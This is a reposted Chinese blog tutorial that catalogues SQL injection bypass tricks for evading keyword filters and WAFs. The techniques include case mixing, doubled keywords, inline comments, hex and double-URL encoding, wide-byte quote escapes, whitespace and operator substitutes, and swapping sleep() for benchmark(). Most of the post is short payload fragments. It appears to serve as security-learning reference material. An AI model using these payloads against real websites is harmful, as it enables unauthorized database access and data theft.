sql注入常见绕过技巧 - 代码天地

sql注入常见绕过技巧

其他 2019-10-03 01:57:55 阅读次数: 0

参考链接：https://blog.csdn.net/huanghelouzi/article/details/82995313

https://www.cnblogs.com/vincy99/p/9642882.html

目录：

大小写绕过
双写绕过
内联注释绕过
编码绕过
<>绕过
注释符绕过
对空格的绕过
对or/and的绕过
对等号=的绕过
对单引号的绕过
对逗号的绕过
过滤函数绕过

0x01 大小写绕过

UniOn SeleCt

0x02 双写绕过

ununionion seselectlect

0x03 内联注释绕过

内联注释就是把一些特有的仅在MYSQL上的语句放在 /*!...*/ 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。

and /*!select*/ 1,2

0x04 编码绕过

16进制绕过：

select * from users where username = test1;
select * from users where username = 0x7465737431;

对关键字进行两次url全编码：

1+and+1=2
1+%25%36%31%25%36%65%25%36%34+1=2

unicode编码对部分符号的绕过：

单引号=> %u0037 %u02b9
空格=> %u0020 %uff00
左括号=> %u0028 %uff08
右括号=> %u0029 %uff09

0x05 <>绕过

某些网站过滤了“<>”符号才行：

unio<>n sel<>ect

0x06注释符绕过

uni/**/on se/**/lect

0x07对空格的绕过

/**/
%20 %09
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格

0x08 对or/and的绕过

and = &&
or = ||

0x09 对等号=的绕过

不加通配符的like执行的效果和=一致，所以可以用来绕过；

rlike的用法和上面的like一样，没有通配符效果和=一样；

regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配

<> 等价于 != ，所以在前面再加一个!结果就是等号了

?id=1 or 1 like 1
?id=1 or 1 rlike 1
?id=1 or 1 regexp 1
?id=1 or !(1 <> 1)或者1 !(<>) 1

0x10 对单引号的绕过

宽字符

# 过滤单引号时
%bf%27  %df%27  %aa%27

使用十六进制

'user'=>0x7573657273

0x11 对逗号的绕过

盲注中使用 from n1 for n2 ,其中n1代表从n1个开始读取n2长度的子串

select substr("string",1,3);
等价于 select substr("string" from 1 for 3);

使用join关键字来绕过

union select 1,2,3
等价于 union select * from (select 1)a join (select 2)b join(select 3)c

使用offset关键字：

适用于limit中的逗号被过滤的情况
limit 2,1等价于limit 1 offset 2

0x12 过滤函数绕过

sleep() -->benchmark()

and sleep(1)
等价于 and benchmark(1000000000,1)

group_concat()–>concat_ws()

select group_concat("str1","str2");
等价于 select concat_ws(",","str1","str2");

猜你喜欢

转载自www.cnblogs.com/-chenxs/p/11618846.html

sql注入常见绕过技巧

SQL注入绕过技巧

SQL注入绕过技巧总结

SQL注入之WAF绕过技巧

SQL注入绕过技巧—入门到进阶

SQL注入进阶练习（二）常见绕过手段、防御的解决方案

Web中常见的绕过和技巧

【SQL注入技巧拓展】————16、绕过WAF注入

SQl注入常见参数

常见sql注入的类型

常见的SQL注入总结

绕过宝塔WAF继续SQL注入小技巧一则

SQL常见小技巧

常见的一些注入技巧

sql注入绕过

sql 注入绕过 waf

SQL注入防御绕过

sql注入绕过姿势

sql注入——waf绕过

绕过 SQL 注入

SQL注入（绕过）

SQL注入绕过技术

SQL注入过滤的绕过

【SQL注入技巧拓展】————4、高级SQL注入：混淆和绕过

【SQL注入技巧拓展】————3、SQL注入防御与绕过的几种姿势

常见的SQL注入检测语句（转载）

常见SQL注入攻击方式

常见的sql注入环境搭建

常见的Web漏洞——SQL注入

SQL注入常见处理方式

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)